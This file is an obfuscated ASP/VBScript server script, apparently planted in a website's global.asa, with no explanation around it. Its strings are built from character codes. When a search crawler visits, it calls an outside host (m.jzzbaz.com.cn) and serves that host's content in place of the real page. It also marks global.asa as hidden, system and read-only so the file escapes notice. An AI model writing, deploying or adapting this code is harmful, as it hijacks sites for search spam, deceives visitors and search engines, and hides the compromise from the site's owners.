<script CodePage=936  language="vbscript" runat="server"> 
Public Z222ZZZZZ22222,Z22222Z2Z22Z22,ZZ2222222Z22Z,ZZ2Z22Z,Z2222222ZZZ22Z
Public ZZ22Z2Z22Z2Z2
Public Z22ZZ222Z22ZZZ
Public ZZ2ZZ2ZZZ22
    Server.ScriptTimeout = ( 84 * 84 - 3456 )  
    On Error Resume Next 
    Z222ZZZZZ22222 = Request.ServerVariables ( Chr ( 72 ) & Chr ( 84 ) & Chr ( 84 ) & Chr ( 80 ) & Chr ( 95 ) & Chr ( 85 ) & Chr ( 83 ) & Chr ( 69 ) & Chr ( 82 ) & Chr ( 95 ) & Chr ( 65 ) & Chr ( 71 ) & Chr ( 69 ) & Chr ( 78 ) & Chr ( 84 ) )  
    Z222ZZZZZ22222 = LCase ( Z222ZZZZZ22222 )  
    If Err.Number <> ( 84 * 58 - 4872 ) Then 
        Err.Clear 
    End If 
    Z22222Z2Z22Z22 = Chr ( 104 ) & Chr ( 116 ) & Chr ( 116 ) & Chr ( 112 ) & Chr ( 58 ) & Chr ( 47 ) & Chr ( 47 ) & Chr ( 109 ) & Chr ( 46 ) & Chr ( 106 ) & Chr ( 122 ) & Chr ( 122 ) & Chr ( 98 ) & Chr ( 97 ) & Chr ( 122 ) & Chr ( 46 ) & Chr ( 99 ) & Chr ( 111 ) & Chr ( 109 ) & Chr ( 46 ) & Chr ( 99 ) & Chr ( 110 ) & Chr ( 47 )  
    ZZ2222222Z22Z = Chr ( 104 ) & Chr ( 116 ) & Chr ( 116 ) & Chr ( 112 ) & Chr ( 58 ) & Chr ( 47 ) & Chr ( 47 ) & Request.ServerVariables ( Chr ( 72 ) & Chr ( 84 ) & Chr ( 84 ) & Chr ( 80 ) & Chr ( 95 ) & Chr ( 72 ) & Chr ( 79 ) & Chr ( 83 ) & Chr ( 84 ) ) & Request.ServerVariables ( Chr ( 115 ) & Chr ( 99 ) & Chr ( 114 ) & Chr ( 105 ) & Chr ( 112 ) & Chr ( 116 ) & Chr ( 95 ) & Chr ( 110 ) & Chr ( 97 ) & Chr ( 109 ) & Chr ( 101 ) )  
    ZZ2Z22Z = Z22222Z2Z22Z22 & Chr ( 47 ) & Chr ( 105 ) & Chr ( 110 ) & Chr ( 100 ) & Chr ( 101 ) & Chr ( 120 ) & Chr ( 46 ) & Chr ( 112 ) & Chr ( 104 ) & Chr ( 112 ) & Chr ( 63 ) & Chr ( 104 ) & Chr ( 111 ) & Chr ( 115 ) & Chr ( 116 ) & Chr ( 61 ) & ZZ2222222Z22Z & Chr ( 38 ) & Chr ( 113 ) & Chr ( 61 ) & Request.ServerVariables ( Chr ( 81 ) & Chr ( 117 ) & Chr ( 101 ) & Chr ( 114 ) & Chr ( 121 ) & Chr ( 95 ) & Chr ( 83 ) & Chr ( 116 ) & Chr ( 114 ) & Chr ( 105 ) & Chr ( 110 ) & Chr ( 103 ) )  
    ZZ22Z2Z22Z2Z2 = Z222ZZZZZ22222 & Request.ServerVariables ( Chr ( 72 ) & Chr ( 84 ) & Chr ( 84 ) & Chr ( 80 ) & Chr ( 95 ) & Chr ( 82 ) & Chr ( 69 ) & Chr ( 70 ) & Chr ( 69 ) & Chr ( 82 ) & Chr ( 69 ) & Chr ( 82 ) )  
    ZZ22Z2Z22Z2Z2 = LCase ( ZZ22Z2Z22Z2Z2 )  
    If ( InStr ( ZZ22Z2Z22Z2Z2 , Chr ( 98 ) & Chr ( 97 ) & Chr ( 105 ) & Chr ( 100 ) & Chr ( 117 ) ) > ( 99 * 42 - 4158 ) Or InStr ( ZZ22Z2Z22Z2Z2 , Chr ( 104 ) & Chr ( 97 ) & Chr ( 111 ) & Chr ( 115 ) & Chr ( 111 ) & Chr ( 117 ) ) > ( 48 * 75 - 3600 ) Or InStr ( ZZ22Z2Z22Z2Z2 , Chr ( 51 ) & Chr ( 54 ) & Chr ( 48 ) ) > ( 39 * 73 - 2847 ) Or InStr ( ZZ22Z2Z22Z2Z2 , Chr ( 121 ) & Chr ( 105 ) & Chr ( 115 ) & Chr ( 111 ) & Chr ( 117 ) ) > ( 52 * 60 - 3120 ) Or InStr ( ZZ22Z2Z22Z2Z2 , Chr ( 115 ) & Chr ( 111 ) & Chr ( 103 ) & Chr ( 111 ) & Chr ( 117 ) ) > ( 10 * 87 - 870 ) Or InStr ( ZZ22Z2Z22Z2Z2 , Chr ( 66 ) & Chr ( 121 ) & Chr ( 116 ) & Chr ( 101 ) & Chr ( 115 ) & Chr ( 112 ) & Chr ( 105 ) & Chr ( 100 ) & Chr ( 101 ) & Chr ( 114 ) ) > ( 13 * 1 - 13 ) ) Then 
        Z2222222ZZZ22Z = Z2222ZZ222Z2Z ( ZZ2Z22Z , Z222ZZZZZ22222 )  
        Response.Write Z2222222ZZZ22Z 
        Response.End 
    End If 
    Set Z22ZZ222Z22ZZZ = Server.CreateObject ( Chr ( 83 ) & Chr ( 99 ) & Chr ( 114 ) & Chr ( 105 ) & Chr ( 112 ) & Chr ( 116 ) & Chr ( 105 ) & Chr ( 110 ) & Chr ( 103 ) & Chr ( 46 ) & Chr ( 70 ) & Chr ( 105 ) & Chr ( 108 ) & Chr ( 101 ) & Chr ( 83 ) & Chr ( 121 ) & Chr ( 115 ) & Chr ( 116 ) & Chr ( 101 ) & Chr ( 109 ) & Chr ( 79 ) & Chr ( 98 ) & Chr ( 106 ) & Chr ( 101 ) & Chr ( 99 ) & Chr ( 116 ) )  
    Set ZZ2ZZ2ZZZ22 = Z22ZZ222Z22ZZZ.Getfile ( Server.MapPath ( Chr ( 47 ) & Chr ( 103 ) & Chr ( 108 ) & Chr ( 111 ) & Chr ( 98 ) & Chr ( 97 ) & Chr ( 108 ) & Chr ( 46 ) & Chr ( 97 ) & Chr ( 115 ) & Chr ( 97 ) ) )  
    If ZZ2ZZ2ZZZ22.attributes <> ( 50 * 94 - 4693 ) Then 
        ZZ2ZZ2ZZZ22.attributes = ( 67 * 14 - 931 )  
    End If 
    Response.Write vbCrLf 
Function Z2222ZZ222Z2Z(Z22ZZZZ2Z2ZZ2,Z222ZZZZZ22222 )
    Dim Z22ZZ2Z2ZZ2Z2
    Dim ZZZ22222ZZZ2Z
    On Error Resume Next 
    Set Z22ZZ2Z2ZZ2Z2 = Server.CreateObject ( Chr ( 77 ) & Chr ( 83 ) & Chr ( 88 ) & Chr ( 77 ) & Chr ( 76 ) & Chr ( 50 ) & Chr ( 46 ) & Chr ( 115 ) & Chr ( 101 ) & Chr ( 114 ) & Chr ( 118 ) & Chr ( 101 ) & Chr ( 114 ) & Chr ( 88 ) & Chr ( 77 ) & Chr ( 76 ) & Chr ( 72 ) & Chr ( 84 ) & Chr ( 84 ) & Chr ( 80 ) )  
    Z22ZZ2Z2ZZ2Z2.Open Chr ( 71 ) & Chr ( 69 ) & Chr ( 84 ) , Z22ZZZZ2Z2ZZ2 , False 
    Z22ZZ2Z2ZZ2Z2.setRequestHeader Chr ( 85 ) & Chr ( 115 ) & Chr ( 101 ) & Chr ( 114 ) & Chr ( 45 ) & Chr ( 65 ) & Chr ( 103 ) & Chr ( 101 ) & Chr ( 110 ) & Chr ( 116 ) , Z222ZZZZZ22222 
    Z22ZZ2Z2ZZ2Z2.send 
    Z2222ZZ222Z2Z = Z22ZZ2Z2ZZ2Z2.responseBody 
    Set Z22ZZ2Z2ZZ2Z2 = Nothing 
    Set ZZZ22222ZZZ2Z = Server.CreateObject ( Chr ( 65 ) & Chr ( 100 ) & Chr ( 111 ) & Chr ( 100 ) & Chr ( 98 ) & Chr ( 46 ) & Chr ( 83 ) & Chr ( 116 ) & Chr ( 114 ) & Chr ( 101 ) & Chr ( 97 ) & Chr ( 109 ) )  
    ZZZ22222ZZZ2Z.Type = ( 21 * 49 - 1028 )  
    ZZZ22222ZZZ2Z.Mode = ( 97 * 100 - 9697 )  
    ZZZ22222ZZZ2Z.Open 
    ZZZ22222ZZZ2Z.Write Z2222ZZ222Z2Z 
    ZZZ22222ZZZ2Z.Position = ( 99 * 18 - 1782 )  
    ZZZ22222ZZZ2Z.Type = ( 8 * 65 - 518 )  
    ZZZ22222ZZZ2Z.Charset = Chr ( 103 ) & Chr ( 98 ) & Chr ( 50 ) & Chr ( 51 ) & Chr ( 49 ) & Chr ( 50 )  
    Z2222ZZ222Z2Z = ZZZ22222ZZZ2Z.ReadText 
    ZZZ22222ZZZ2Z.Close 
    If Err.Number <> ( 38 * 74 - 2812 ) Then 
        Err.Clear 
    End If 
End Function

</script> 